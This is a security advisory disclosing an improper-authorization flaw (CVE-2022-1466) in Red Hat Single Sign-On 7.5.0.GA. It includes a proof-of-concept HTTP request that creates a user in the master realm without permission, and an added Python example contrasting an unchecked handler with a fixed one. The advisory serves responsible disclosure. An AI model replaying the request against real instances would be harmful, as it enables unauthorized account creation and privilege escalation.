CVE-2022-1466

Due to improper authorization, Red Hat Single Sign-On is vulnerable to users performing actions that they should not be allowed to perform. It was possible to add users to the master realm even though no respective permission was granted.


Advisory ID: SYSS-2021-076
Product: Red Hat Single Sign-On
Manufacturer: Red Hat, Inc.
Affected Version(s): 7.5.0.GA
Tested Version(s): 7.5.0.GA
Vulnerability Type: Improper Authorization (CWE-285)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2021-12-08
Solution Date: To be determined
Public Disclosure: 2022-02-10
CVE Reference: Not yet assigned
Author of Advisory: Christian Dölling, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Red Hat Single Sign-On is a single sign-on solution.

The manufacturer describes the product as follows (see [1]):

“Red Hat Single Sign-On (RH-SSO) is based on the Keycloak project and enables you to secure your web applications by providing Web single sign-on (SSO) capabilities based on popular standards such as SAML 2.0, OpenID Connect and OAuth 2.0. The RH-SSO server can act as a SAML or OpenID Connect-based Identity Provider, mediating with your enterprise user directory or 3rd-party SSO provider for identity information and your applications via standards-based tokens.”

Due to improper authorization, Red Hat Single Sign-On is vulnerable to users performing actions they should not be allowed to perform.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

It was possible to add users to the master realm even though no respective permission was granted.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The author was provided with a user account with administrative privileges in all realms but the master realm. Within the master realm, read-only permissions were granted. This was confirmed by the owner of the Red Hat Single Sign-On instance and was reflected by the fact that an “add user” button was available in all realms but the master realm.
Nevertheless, when the author sent the following request to the server, the server responded as shown below.

Request:

POST /auth/admin/realms/master/users HTTP/1.1
Host: login-stage.customer.com
Cookie: INGRESS_SESSION_ID=XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer […]
Content-Length: 146
Origin: https://login-stage.customer.com
Te: trailers
Connection: close

{"enabled":true,"attributes":{},"groups":[],"emailVerified":true,"username":"SySS PoC","email":"[email protected]","firstName":"SySS","lastName":"PoC"}

Response:

HTTP/1.1 201 Created
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://login-stage.customer.com
Access-Control-Expose-Headers: Location
Date: Tue, 07 Dec 2021 15:44:58 GMT
Location: https://login-stage.customer.com/auth/admin/realms/master/users/f5436560-00d0-42db-8486-81db59e61612
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 0
Connection: Close

Afterwards, the author was able to confirm the successful creation of the user in the web front end.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Check the caller's authorization on the server before adding a new user.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-12-07: Vulnerability discovered
2021-12-08: Vulnerability reported to manufacturer
TBD: Patch released by manufacturer
2022-02-10: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Red Hat Single Sign-On
    https://access.redhat.com/products/red-hat-single-sign-on
[2] SySS Security Advisory SYSS-2021-076
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-076.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Dölling of SySS GmbH.

E-Mail: [email protected]
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_D%C3%B6lling.asc
Key Fingerprint: 5478 245B 07F7 11D8 89EB 4FF9 22CC 67D4 1729 49A2

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
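The advisory's Solution section asks for the permission check to be made on the server before a user is created. The following added example is a constructed model, not Red Hat SSO or Keycloak code: it assumes hypothetical permission names `manage-users` and `view-users` and a caller granted rights like the account in the PoC, and contrasts a handler that writes to the realm taken from the request path without any check against one that authorizes the caller for that specific realm first.

```python
import re
from dataclasses import dataclass

# Hypothetical permission names: the advisory only says the account had
# admin rights in every realm except master, and read-only rights there.
MANAGE_USERS = "manage-users"
VIEW_USERS = "view-users"
USERS_ENDPOINT = re.compile(r"^/auth/admin/realms/(?P<realm>[^/]+)/users$")

class Forbidden(Exception):
    """Caller lacks the required permission in the target realm."""

@dataclass
class Caller:
    username: str
    permissions: dict  # realm name -> set of permissions held in that realm

def realm_from_path(path: str) -> str:
    """Take the target realm from the request path, as the server must."""
    m = USERS_ENDPOINT.match(path)
    if m is None:
        raise ValueError("not the admin users endpoint: " + path)
    return m.group("realm")

def create_user_unchecked(realms: dict, caller: Caller, path: str, body: dict) -> str:
    """Flawed handler: the UI hides the 'add user' button, but the server
    never checks the caller's permission in the realm it writes to."""
    realms[realm_from_path(path)].append(body["username"])
    return "201 Created"

def create_user_checked(realms: dict, caller: Caller, path: str, body: dict) -> str:
    """Fixed handler: authorization is decided server-side, against the realm
    named in the path, before any state changes."""
    realm = realm_from_path(path)
    if MANAGE_USERS not in caller.permissions.get(realm, set()):
        raise Forbidden(f"{caller.username} may not manage users in {realm}")
    realms[realm].append(body["username"])
    return "201 Created"

def demo() -> tuple:
    """Replay the advisory's scenario (constructed data) against both handlers."""
    realms = {"master": [], "customer": []}  # realm name -> usernames
    caller = Caller("auditor", {"master": {VIEW_USERS}, "customer": {MANAGE_USERS}})
    body = {"username": "SySS PoC", "enabled": True}
    unchecked = create_user_unchecked(realms, caller, "/auth/admin/realms/master/users", body)
    try:
        checked = create_user_checked(realms, caller, "/auth/admin/realms/master/users", body)
    except Forbidden:
        checked = "403 Forbidden"
    return unchecked, checked, realms["master"]
```

The check keys on the realm parsed from the path rather than on whatever the client claims, so a caller who is an administrator elsewhere still gets 403 in master.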
